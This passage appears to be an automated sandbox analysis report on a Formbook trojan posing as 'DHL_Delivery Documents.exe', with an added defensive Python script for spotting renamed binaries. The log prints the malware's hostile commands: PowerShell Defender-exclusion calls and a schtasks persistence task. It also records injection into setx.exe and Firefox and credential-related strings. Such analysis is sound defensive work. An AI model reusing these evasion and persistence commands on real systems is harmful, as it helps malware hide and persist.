            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C20E59
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDEE26
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C12FC8
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C2CFE0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C9EFA0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C94F40
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C62F28
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C40F30
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CC2F30
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C10CF2
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CC0CB5
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C20C00
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C1ADE0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C38DBF
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C2AD00
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CBCD1F
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C3B2C0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CC12ED
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C252A0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C6739A
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C0D34C
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD132D
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CCF0CC
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C270C0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD70E9
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDF0E0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C2B1B0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CEB16B
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C5516C
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C0F172
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD16CC
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C65630
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDF7B0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C11460
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDF43F
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CE95C3
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CBD5B0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD7571
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CCDAC6
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C65AA0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CBDAAC
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CC1AA3
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDFA49
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD7A46
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C93A6C
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C95BF0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C5DBF9
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C3FB80
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDFB76
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C238E0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C8D800
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C29950
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C3B950
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CB5910
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C29EB0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C21F92
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02BE3FD5
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02BE3FD2
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDFFB1
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDFF09
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CDFCF2
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C99C32
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C3FDC0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02C23D40
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD1D5A
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_02CD7D73
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_00421A30
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_0043A4E0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_0041CC40
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_0041CE60
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_0041AEE0
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_00430F80
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_0041B0B8
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_0042355E
            Source: C:\Windows\SysWOW64\setx.exe | Code function: 18_2_00423560
            Source: C:\Windows\SysWOW64\setx.exe | Code function: String function: 02C55130 appears 58 times
            Source: C:\Windows\SysWOW64\setx.exe | Code function: String function: 02C9F290 appears 105 times
            Source: C:\Windows\SysWOW64\setx.exe | Code function: String function: 02C8EA12 appears 86 times
            Source: C:\Windows\SysWOW64\setx.exe | Code function: String function: 02C0B970 appears 280 times
            Source: C:\Windows\SysWOW64\setx.exe | Code function: String function: 02C67E54 appears 111 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: String function: 01C8EA12 appears 86 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: String function: 01C55130 appears 58 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: String function: 01C0B970 appears 280 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: String function: 01C67E54 appears 111 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: String function: 01C9F290 appears 105 times
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: String function: 0165EA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: String function: 01637E54 appears 97 times
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2086231730.0000000005350000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2078783372.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2090689582.00000000062C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2089429532.0000000005644000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034582111.0000000000AB8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJeWB.exeF vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001D0D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.00000000017A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesetx.exej% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesetx.exej% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe | Binary or memory string: OriginalFilenameJeWB.exeF vs DHL_Delivery Documents.exe
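The "OriginalFilename ... vs DHL_Delivery Documents.exe" findings above compare the file name embedded in a PE's VERSIONINFO string table with the name the sample actually runs under. A mismatch such as JeWB.exe, SimpleLogin.dll or Tyrone.dll is a weak but useful sign of a renamed or repackaged binary; ntdll.dll, clr.dll, setx.exe and PowerShell.EXE.MUI, on the other hand, are modules legitimately mapped into the analysed processes and have to be filtered out before the indicator means anything. The stray character after some names (JeWB.exeF, clr.dllT, ntdll.dllj%) appears to be whatever follows the string in memory rather than part of the name. The script below is an added example written for this report, not Joe Sandbox code: it reproduces the check over a constructed byte blob that imitates the UTF-16LE String entries of a VS_VERSION_INFO block (the values are the ones listed above), reads each value only up to its NUL terminator, and ignores the module names passed as expected. The function names and the layout helper are the author's.

```python
"""Recover VERSIONINFO OriginalFilename values from a memory dump and compare
them with the name the binary actually runs under.

Added example written for this report; not Joe Sandbox code.  SAMPLE_DUMP is a
constructed byte blob that imitates the UTF-16LE "String" entries of a
VS_VERSION_INFO block, populated with the values this report lists.
"""
import struct

KEY = "OriginalFilename".encode("utf-16-le")


def _string_entry(key: str, value: str) -> bytes:
    """Build one VS_VERSION_INFO String: wLength, wValueLength, wType,
    NUL-terminated UTF-16 key, DWORD padding, NUL-terminated UTF-16 value."""
    k = (key + "\0").encode("utf-16-le")
    v = (value + "\0").encode("utf-16-le")
    pad = b"\0" * ((-(6 + len(k))) % 4)          # align the value on a DWORD boundary
    length = 6 + len(k) + len(pad) + len(v)
    return struct.pack("<HHH", length, len(value) + 1, 1) + k + pad + v


# Constructed stand-in for the .sdmp regions the report quotes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + _string_entry("CompanyName", "")
    + _string_entry("OriginalFilename", "JeWB.exe")
    + b"\xcc" * 40                                # unrelated bytes between two blocks
    + _string_entry("OriginalFilename", "SimpleLogin.dll")
    + _string_entry("OriginalFilename", "Tyrone.dll")
    + _string_entry("OriginalFilename", "ntdll.dll")
    + _string_entry("InternalName", "JeWB")
)


def original_filenames(blob: bytes) -> list[str]:
    """Every OriginalFilename value in the blob, in order of appearance.

    The value is read as UTF-16LE code units up to the NUL terminator, so bytes
    that merely follow the string in memory are not swept into the name."""
    names = []
    pos = blob.find(KEY)
    while pos != -1:
        i = pos + len(KEY)
        # skip the key's own NUL terminator and any alignment padding
        while i + 1 < len(blob) and blob[i:i + 2] == b"\0\0":
            i += 2
        units = []
        while i + 1 < len(blob) and blob[i:i + 2] != b"\0\0":
            units.append(blob[i:i + 2])
            i += 2
        if units:
            try:
                names.append(b"".join(units).decode("utf-16-le"))
            except UnicodeDecodeError:
                pass                              # key text without a real string table behind it
        pos = blob.find(KEY, i)
    return names


def mismatched_names(blob: bytes, running_as: str, expected_modules=()) -> list[str]:
    """OriginalFilename values that match neither the on-disk name nor a module
    known to be mapped into the process (ntdll.dll, clr.dll, setx.exe ...)."""
    ignore = {running_as.lower()} | {m.lower() for m in expected_modules}
    return [n for n in original_filenames(blob) if n.lower() not in ignore]


if __name__ == "__main__":
    for name in mismatched_names(SAMPLE_DUMP, "DHL_Delivery Documents.exe", ["ntdll.dll"]):
        print(f"OriginalFilename {name} vs DHL_Delivery Documents.exe")
```

Against a real dump, pass the loaded-module list from the same process (the DLLs the sandbox recorded) as expected_modules; without that filter every mapped system DLL trips the check and the indicator is useless.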
            Source: DHL_Delivery Documents.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: DHL_Delivery Documents.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: YybGLWQSx.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, W3yVFhmE2W66Gxi81U.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, W3yVFhmE2W66Gxi81U.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.YybGLWQSx.exe.24be2c4.0.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 9.2.YybGLWQSx.exe.24ae2b8.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.DHL_Delivery Documents.exe.2e6e2f0.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.DHL_Delivery Documents.exe.5520000.4.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.DHL_Delivery Documents.exe.2e5e2d8.0.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@7/2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | File created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3106.tmp
            Source: DHL_Delivery Documents.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DHL_Delivery Documents.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.dr | Binary or memory string: UPDATE [patient] SET [patientId] = @patientId, [firstName] = @firstName, [lastName] = @lastName, [mobileNumber] = @mobileNumber, [email] = @email, [userName] = @userName, [password] = @password WHERE (([patientId] = @Original_patientId) AND ([firstName] = @Original_firstName) AND ([lastName] = @Original_lastName) AND ((@IsNull_mobileNumber = 1 AND [mobileNumber] IS NULL) OR ([mobileNumber] = @Original_mobileNumber)) AND ([email] = @Original_email) AND ([userName] = @Original_userName) AND ([password] = @Original_password));
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.dr | Binary or memory string: UPDATE [patient] SET [userName] = @userName, [password] = @password, [patientId] = @patientId WHERE (([userName] = @Original_userName) AND ([password] = @Original_password) AND ([patientId] = @Original_patientId));
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.dr | Binary or memory string: INSERT INTO [patient] ([patientId], [firstName], [lastName], [mobileNumber], [email], [userName], [password]) VALUES (@patientId, @firstName, @lastName, @mobileNumber, @email, @userName, @password);
            Source: setx.exe, 00000012.00000002.3278866707.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3278866707.0000000000705000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3278866707.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2891782711.00000000006D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL_Delivery Documents.exe | ReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | File read: C:\Users\user\Desktop\DHL_Delivery Documents.exe
            Source: unknown | Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe C:\Users\user\AppData\Roaming\YybGLWQSx.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeProcess created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"
            Source: C:\Windows\SysWOW64\setx.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
